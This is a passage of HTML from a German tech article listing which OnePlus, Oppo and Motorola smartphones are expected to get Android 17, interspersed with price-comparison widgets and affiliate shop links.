							<a class="price-comparison__view-button" href="https://www.awin1.com/cread.php?awinmid=28525&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://www.honor.com/de/phones/honor-magic8-pro/buy/" data-vars-product-name="Honor Magic 8 Pro" data-vars-product-id="3028635" data-vars-category="Smartphones" data-vars-manufacturer-id="16149" data-vars-manufacturer="Honor" data-vars-vendor="billiger,gtin,amazon,mpn,Honor" data-vars-po="billiger,gtin,amazon,mpn" data-product="3028635" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.awin1.com/cread.php?awinmid=28525&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://www.honor.com/de/phones/honor-magic8-pro/buy/" data-vars-product-price="1.299,90 €" data-vars-product-vendor="Honor" aria-label="Deal anschauen bei Honor für 1.299,90 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
									</div>
									<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
											<button class="price-comparison__view-more-button">
							Weitere Angebote						</button>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">OnePlus</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a34e2629e37f"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/OnePlus-15T-green.jpg?quality=50&amp;strip=all&amp;w=1200" alt="OnePlus 15T green" class="wp-image-3084428" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">OnePlus</p></div>



<p>Der chinesische Hersteller OnePlus gibt für die meisten seiner Geräte recht eindeutige Update-Versprechen. Ältere Modelle fallen dennoch aus dem Update-Zyklus.</p>



<p>Diese Oneplus-Smartphones sollten auch Android 17 bekommen:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/2972780/oneplus-15-test-handy-flaggschiff.html" target="_blank" rel="noreferrer noopener">OnePlus 15</a></li>



<li><a href="https://www.pcwelt.de/article/3033893/oneplus-15r-test.html" target="_blank" rel="noreferrer noopener">OnePlus 15R</a></li>



<li><a href="https://www.pcwelt.de/article/2582777/oneplus-13-test-smartphone-unter-1000-euro.html" target="_blank" rel="noreferrer noopener">OnePlus 13</a></li>



<li><a href="https://www.pcwelt.de/article/2581125/oneplus-13r-im-test-grossartiger-allrounder-mit-toller-leistung.html" target="_blank" rel="noreferrer noopener">OnePlus 13R</a></li>



<li><a href="https://www.pcwelt.de/article/2218966/oneplus-12-test.html" target="_blank" rel="noreferrer noopener">Oneplus 12</a></li>



<li><a href="https://www.pcwelt.de/article/2231965/oneplus-12r-test.html" target="_blank" rel="noreferrer noopener">Oneplus 12R</a></li>



<li><a href="https://www.pcwelt.de/article/1812962/oneplus-11-test-smartphone.html" target="_blank" rel="noreferrer noopener">Oneplus 11 5G</a></li>



<li>Oneplus Open</li>



<li><a href="https://www.pcwelt.de/article/2852837/oneplus-nord-ce-5-test.html" target="_blank" rel="noreferrer noopener">OnePlus Nord CE5</a></li>



<li><a href="https://www.pcwelt.de/article/2847544/oneplus-nord-5-test-2.html" target="_blank" rel="noreferrer noopener">Oneplus Nord 5</a></li>



<li>Oneplus Nord CE4</li>



<li><a href="https://www.pcwelt.de/article/2420699/oneplus-nord-4-test.html" target="_blank" rel="noreferrer noopener">Oneplus Nord 4</a></li>
</ul>



<p><br><strong>Voraussichtlich kein Android 17:</strong> OnePlus 10 Pro, 10T, 10R, Nord 3 5G, Nord CE 3 Lite 5G, Nord CE4 Lite 5G.</p>



<p><strong>OnePlus 15 im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/24204.png" alt="coolblue" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>785,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Fl4lLy85ZaKXVSmyu4TSBOJIer0pWn6UOyTCPCrRqn_-Kd4oOLB2U9QbcD9aZqXRlKfpa4qJRMyOscaqQuGlAbN4jlV8XjM4WLJy4KUK9witirrdMBgfg8QxsAUILxBhSfQC3B40ZTv&amp;mid=685729038981&amp;id=685729038981&amp;ts=20260619&amp;log=rss" data-vars-product-name="OnePlus 15" data-vars-product-id="2970407" data-vars-category="Smartphones" data-vars-manufacturer-id="15286" data-vars-manufacturer="OnePlus" data-vars-vendor="billiger,gtin,amazon,mpn,OnePlus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2970407" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Fl4lLy85ZaKXVSmyu4TSBOJIer0pWn6UOyTCPCrRqn_-Kd4oOLB2U9QbcD9aZqXRlKfpa4qJRMyOscaqQuGlAbN4jlV8XjM4WLJy4KUK9witirrdMBgfg8QxsAUILxBhSfQC3B40ZTv&amp;mid=685729038981&amp;id=685729038981&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="785,99 €" data-vars-product-vendor="coolblue" aria-label="Deal anschauen bei coolblue für 785,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>799,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=x1bxm_3VvDlXVSmyu4TSBO3QKcigQmkges28yFjmDxaigJs7LnKJLhejOOf5eEjiVKfpa4qJRMyOscaqQuGlAYd5CuUrGlfkePF7nAYeFWZpUfGMZXTif6CpxUJk2naUUyWbwcakYeT&amp;mid=685723675830&amp;id=685723675830&amp;ts=20260619&amp;log=rss" data-vars-product-name="OnePlus 15" data-vars-product-id="2970407" data-vars-category="Smartphones" data-vars-manufacturer-id="15286" data-vars-manufacturer="OnePlus" data-vars-vendor="billiger,gtin,amazon,mpn,OnePlus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2970407" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=x1bxm_3VvDlXVSmyu4TSBO3QKcigQmkges28yFjmDxaigJs7LnKJLhejOOf5eEjiVKfpa4qJRMyOscaqQuGlAYd5CuUrGlfkePF7nAYeFWZpUfGMZXTif6CpxUJk2naUUyWbwcakYeT&amp;mid=685723675830&amp;id=685723675830&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="799,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 799,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/9999.png" alt="Amazon Marketplace CE" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>805,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=h8p9x6GB-WNvsU1Wdh-mdc5Hd99OQeF7SRLp-Crz6SwEbEokfk-c7Df3Fm5WBhqPIp5eUIvJnUomB-cUXbVThKUzeZtSXb6XeZzuaQJ9YrVV6p6WpVLxX0yCqnxT5Vlcnd1XjjLGxQT&amp;mid=686419020389&amp;id=686419020389&amp;ts=20260619&amp;log=rss" data-vars-product-name="OnePlus 15" data-vars-product-id="2970407" data-vars-category="Smartphones" data-vars-manufacturer-id="15286" data-vars-manufacturer="OnePlus" data-vars-vendor="billiger,gtin,amazon,mpn,OnePlus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2970407" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=h8p9x6GB-WNvsU1Wdh-mdc5Hd99OQeF7SRLp-Crz6SwEbEokfk-c7Df3Fm5WBhqPIp5eUIvJnUomB-cUXbVThKUzeZtSXb6XeZzuaQJ9YrVV6p6WpVLxX0yCqnxT5Vlcnd1XjjLGxQT&amp;mid=686419020389&amp;id=686419020389&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="805,00 €" data-vars-product-vendor="Amazon Marketplace CE" aria-label="Deal anschauen bei Amazon Marketplace CE für 805,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>849,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0ZAxXLF7BZ8f7aDQSDOyE6VW8XdEOWSRxq5LL3gM66IMdozeyQB1s3_NYWZJZdx_K69FiNidwqVqeog659UJ2w6xxqpC4aUBs3iOVXxeMzhYsnLgpQr3CKlSEx970DG4SCMIMJod4ad&amp;mid=686311368892&amp;id=686311368892&amp;ts=20260619&amp;log=rss" data-vars-product-name="OnePlus 15" data-vars-product-id="2970407" data-vars-category="Smartphones" data-vars-manufacturer-id="15286" data-vars-manufacturer="OnePlus" data-vars-vendor="billiger,gtin,amazon,mpn,OnePlus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2970407" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0ZAxXLF7BZ8f7aDQSDOyE6VW8XdEOWSRxq5LL3gM66IMdozeyQB1s3_NYWZJZdx_K69FiNidwqVqeog659UJ2w6xxqpC4aUBs3iOVXxeMzhYsnLgpQr3CKlSEx970DG4SCMIMJod4ad&amp;mid=686311368892&amp;id=686311368892&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="849,00 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 849,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__hidden-records-wrapper">
									<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/oneplus-logo.svg" alt="OnePlus" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>949,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://clk.tradedoubler.com/click?p=321001&amp;a=1573066&amp;epi=rss&amp;url=https://www.oneplus.com/de/oneplus-15" data-vars-product-name="OnePlus 15" data-vars-product-id="2970407" data-vars-category="Smartphones" data-vars-manufacturer-id="15286" data-vars-manufacturer="OnePlus" data-vars-vendor="billiger,gtin,amazon,mpn,OnePlus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2970407" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://clk.tradedoubler.com/click?p=321001&amp;a=1573066&amp;epi=rss&amp;url=https://www.oneplus.com/de/oneplus-15" data-vars-product-price="949,00 €" data-vars-product-vendor="OnePlus" aria-label="Deal anschauen bei OnePlus für 949,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
									</div>
									<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
											<button class="price-comparison__view-more-button">
							Weitere Angebote						</button>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Oppo</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a34e262a98da"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/02/PXL_20260222_112411266.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Oppo Find X9 Pro" class="wp-image-3067642" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mattias Inghe</p></div>



<p>Bei Oppo stehen die Chancen für die meisten, neueren Smartphones ebenfalls gut, das Update auf Android 17 zu erhalten. Ältere Reno- oder Find-Modelle fallen aber schon bald aus dem Support heraus und sind daher nicht mehr dabei.</p>



<p>Diese Oppo-Smartphones bekommen voraussichtlich Android 17:</p>



<ul class="wp-block-list">
<li>Find N6</li>



<li><a href="https://www.pcwelt.de/article/2967222/oppo-find-x9-pro-test.html" target="_blank" rel="noreferrer noopener">Find X9</a> / Pro</li>



<li><a href="https://www.pcwelt.de/article/2875375/oppo-a5-5g-test.html" target="_blank" rel="noreferrer noopener">A5 5G</a> / <a href="https://www.pcwelt.de/article/2874342/oppo-a5-pro-5g-test.html" target="_blank" rel="noreferrer noopener">5G Pro</a></li>



<li><a href="https://www.pcwelt.de/article/2882216/oppo-a40-test.html" target="_blank" rel="noreferrer noopener">A40</a></li>



<li>Reno 15 / Pro</li>



<li>Reno 14 / Pro</li>



<li>Reno 13 / Pro / F / FS</li>



<li>Find X8 /<a href="https://www.pcwelt.de/article/2546364/oppo-find-x8-pro-test.html" target="_blank" rel="noreferrer noopener"> Pro</a> / Ultra</li>



<li>Find X7 / Ultra</li>



<li>Find N5 </li>
</ul>



<p><strong>Wahrscheinlich kein Android 17:</strong> Find X6, Find X6 Pro, Find X5, Find X5 Lite, Find X5 Pro, Find N2, Find N2 Flip, Reno 12, Reno 12 Pro, Reno 12 F, Reno 12 FS, Reno 11, Reno 11 Pro, Reno 11 F, Reno 11 FS.</p>



<p><strong>Oppo Find X9 Pro im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.149,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=NgZUCdtq9yKRDMrEUYsO-lVt6WZAp33cZVVrknm2NO91g7_hVoNHUkNR6XImhoGB4kZKpwcYI7dt7qIgcPRIYY5X-0OOTvOfkgc8dTa8CpEu0KHgASXwPOBM5fY0DfQDA&amp;mid=685718919073&amp;id=685718919073&amp;ts=20260619&amp;log=rss" data-vars-product-name="Oppo Find X9 Pro" data-vars-product-id="2953628" data-vars-category="Smartphones" data-vars-manufacturer-id="19463" data-vars-manufacturer="Oppo" data-vars-vendor="billiger,gtin,amazon,mpn,Amazon,Galaxus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2953628" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=NgZUCdtq9yKRDMrEUYsO-lVt6WZAp33cZVVrknm2NO91g7_hVoNHUkNR6XImhoGB4kZKpwcYI7dt7qIgcPRIYY5X-0OOTvOfkgc8dTa8CpEu0KHgASXwPOBM5fY0DfQDA&amp;mid=685718919073&amp;id=685718919073&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.149,00 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 1.149,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.299,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0FVX2B3K4?tag=pcwelt.de-21&amp;ascsubtag=rss" data-vars-product-name="Oppo Find X9 Pro" data-vars-product-id="2953628" data-vars-category="Smartphones" data-vars-manufacturer-id="19463" data-vars-manufacturer="Oppo" data-vars-vendor="billiger,gtin,amazon,mpn,Amazon,Galaxus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2953628" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0FVX2B3K4?tag=pcwelt.de-21&amp;ascsubtag=rss" data-vars-product-price="1.299,00 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 1.299,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Galaxus</span>
													</div>
												<div class="price-comparison__price ">
						<span>1.299,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://clkde.tradedoubler.com/click?p=302027&amp;a=1573066&amp;g=24721470&amp;epi=rss&amp;url=https://www.galaxus.de/de/s1/product/oppo-find-x9-pro-512-gb-charcoal-titanium-678-dual-sim-5g-smartphone-64659612" data-vars-product-name="Oppo Find X9 Pro" data-vars-product-id="2953628" data-vars-category="Smartphones" data-vars-manufacturer-id="19463" data-vars-manufacturer="Oppo" data-vars-vendor="billiger,gtin,amazon,mpn,Amazon,Galaxus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2953628" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://clkde.tradedoubler.com/click?p=302027&amp;a=1573066&amp;g=24721470&amp;epi=rss&amp;url=https://www.galaxus.de/de/s1/product/oppo-find-x9-pro-512-gb-charcoal-titanium-678-dual-sim-5g-smartphone-64659612" data-vars-product-price="1.299,00 €" data-vars-product-vendor="Galaxus" aria-label="Deal anschauen bei Galaxus für 1.299,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.299,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=J95VTz7FRaCRDMrEUYsO-lVt6WZAp33caePUA46xw5U1g7_hVoNHUk8tZGB_C9SE6I4j3j7iWFlHg11Fq30E9rY8ixeJjpfhM0s_4gYjf7vaU99UMVAo-fFcCRJ0K_0r8heIMguSTZ4&amp;mid=685873240083&amp;id=685873240083&amp;ts=20260619&amp;log=rss" data-vars-product-name="Oppo Find X9 Pro" data-vars-product-id="2953628" data-vars-category="Smartphones" data-vars-manufacturer-id="19463" data-vars-manufacturer="Oppo" data-vars-vendor="billiger,gtin,amazon,mpn,Amazon,Galaxus" data-vars-po="billiger,gtin,amazon,mpn" data-product="2953628" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=J95VTz7FRaCRDMrEUYsO-lVt6WZAp33caePUA46xw5U1g7_hVoNHUk8tZGB_C9SE6I4j3j7iWFlHg11Fq30E9rY8ixeJjpfhM0s_4gYjf7vaU99UMVAo-fFcCRJ0K_0r8heIMguSTZ4&amp;mid=685873240083&amp;id=685873240083&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.299,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 1.299,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Motorola</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a34e262aea3f"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/02/PXL_20260217_075728904.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Motorola Signature gränssnitt" class="wp-image-3062983" width="1200" height="841" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mattias Inghe</p></div>



<p>Motorola ist ein etwas schwieriger Fall. Denn obwohl alle Hersteller gleichermaßen von der EU-Regelung betroffen sind, mindestens fünf Jahre Updates zu liefern, meinte das Unternehmen lange Zeit, ein “Schlupfloch” in dieser Aussage gefunden zu haben. Daher verspricht es für einige Geräte nur vier Android-Updates.</p>



<p>Ob sich das bewahrheitet, wird sich erst noch zeigen müssen. Diese Motorola-Smartphones bekommen aber mit großer Wahrscheinlichkeit Android 17:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3068644/motorola-signature-test.html" target="_blank" rel="noreferrer noopener">Signature</a></li>



<li><a href="https://www.pcwelt.de/article/2986379/motorola-edge-70-test.html" target="_blank" rel="noreferrer noopener">Edge 70</a></li>



<li><a href="https://www.pcwelt.de/article/2839163/motorola-edge-60-test-2.html" target="_blank" rel="noreferrer noopener">Edge 60</a> / Ultra / <a href="https://www.pcwelt.de/article/2824306/motorola-edge-60-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a> / <a href="https://www.pcwelt.de/article/3042698/motorola-edge-60-fusion-test.html" target="_blank" rel="noreferrer noopener">Fusion </a>/ Neo</li>



<li>Edge 50 / <a href="https://www.pcwelt.de/article/2367963/motorola-edge-50-ultra-smartphone-test.html" target="_blank" rel="noreferrer noopener">Ultra</a> / <a href="https://www.pcwelt.de/article/2332502/motorola-edge-50-pro-test-2.html" target="_blank" rel="noreferrer noopener">Pro</a> / Fusion / Neo</li>



<li>Razr 60 / <a href="https://www.pcwelt.de/article/2764578/motorola-razr-60-test.html" target="_blank" rel="noreferrer noopener">Ultra</a></li>



<li><a href="https://www.pcwelt.de/article/2447520/motorola-razr-50-im-test-faltbares-smartphone-zum-erschwinglichen-preis.html" target="_blank" rel="noreferrer noopener">Razr 50</a> / <a href="https://www.pcwelt.de/article/2603789/motorola-razr-50-ultra-smartphone-test.html" target="_blank" rel="noreferrer noopener">Ultra</a> / Neo</li>



<li>Moto G56</li>



<li><a href="https://www.pcwelt.de/article/2572797/motorola-moto-g75-test-2.html" target="_blank" rel="noreferrer noopener">Moto G75</a></li>



<li>Moto G86</li>



<li>Moto G86 Power</li>



<li>Lenovo Thinkphone 25</li>
</ul>



<p><strong>Eher kein Android 17:</strong> Edge 40, Edge 40 Pro, Edge 40 Neo, Razr 40, Razr 40 Ultra, Razr 40 Neo, Moto G35, Moto G45, Moto G55, Moto G85, Lenovo Thinkphone.</p>



<p><strong>Motorola Edge 70 im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/4541.png" alt="notebooksbilliger" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>379,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=mQXz358ILJbgFdiMIpCMzOLmod-rlVfsUbN7aF8bFrTHe66dKLCcTskzmk7s2ctphqUtowA_vsBCz4pjixzOwRCDZyrMD_o6rFbwg9h-X_KwCzMYlQWPHBOzUf3LqnIN5vtgtJls728&amp;mid=686333000777&amp;id=686333000777&amp;ts=20260619&amp;log=rss" data-vars-product-name="Motorola Edge 70" data-vars-product-id="2969341" data-vars-category="Mid-range smartphones" data-vars-manufacturer-id="10019" data-vars-manufacturer="Motorola" data-vars-vendor="billiger,amazon,gtin,mpn,Motorola" data-vars-po="billiger,amazon,gtin,mpn" data-product="2969341" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=mQXz358ILJbgFdiMIpCMzOLmod-rlVfsUbN7aF8bFrTHe66dKLCcTskzmk7s2ctphqUtowA_vsBCz4pjixzOwRCDZyrMD_o6rFbwg9h-X_KwCzMYlQWPHBOzUf3LqnIN5vtgtJls728&amp;mid=686333000777&amp;id=686333000777&amp;ts=20260619&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="379,99 €" data-vars-product-vendor="notebooksbilliger" aria-label="Deal anschauen bei notebooksbilliger für 379,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
